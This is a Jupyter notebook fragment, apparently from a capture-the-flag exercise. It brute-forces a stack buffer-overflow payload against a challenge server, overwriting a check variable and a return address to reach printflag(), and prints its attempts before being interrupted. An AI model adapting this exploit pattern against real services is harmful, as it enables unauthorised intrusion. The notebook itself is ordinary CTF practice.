In [8]:
import socket

class ServerConnection:
    def __init__(self):
        self.HOST = "bof101.sstf.site"
        self.PORT = 1337
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((self.HOST, self.PORT))

    def send(self, payload):
        # Recieve printflag()'s addr: 0x4011f6\n
        assert self.socket.recv(1024).decode() == "printflag()'s addr: 0x4011f6\n"
        # Recieve What is your name?\n:
        prompt = self.socket.recv(1024)
        assert prompt.decode() == "What is your name?\n: "
        self.socket.sendall(payload + b'\n')

        # Receive the response
        response = self.socket.recv(1024)
        return response
    
    def close(self):
        self.socket.close()


In [9]:
from Crypto.Util.number import long_to_bytes
address_of_printflag = 0x004011f6

filler = b'_'
for offset2 in range(0, 256, 4):
    for order in ('little', 'big'):
        connection = ServerConnection()
        payload = filler * 140  # Fill the name buffer
        payload += long_to_bytes(0xdeadbeef, 4)[::-1]  # Overwrite the check variable
        payload += filler * offset2 + address_of_printflag.to_bytes(4, order)  # Add the address of printflag
        payload += long_to_bytes(0x00000000, 4)[::-1]  # Overwrite the check variable

        print(payload)
        # Now you can send this payload as input to the program
        print(f'offset:{offset2}, order:({order}), response: "{connection.send(payload)}"')

b'____________________________________________________________________________________________________________________________________________\xef\xbe\xad\xde\xf6\x11@\x00\x00\x00\x00\x00'
offset:0, order:(little), response: "b''"
b'____________________________________________________________________________________________________________________________________________\xef\xbe\xad\xde\x00@\x11\xf6\x00\x00\x00\x00'
offset:0, order:(big), response: "b''"
b'____________________________________________________________________________________________________________________________________________\xef\xbe\xad\xde____\xf6\x11@\x00\x00\x00\x00\x00'
offset:4, order:(little), response: "b''"
b'____________________________________________________________________________________________________________________________________________\xef\xbe\xad\xde____\x00@\x11\xf6\x00\x00\x00\x00'
offset:4, order:(big), response: "b''"
b'________________________________________________________________________

KeyboardInterrupt: 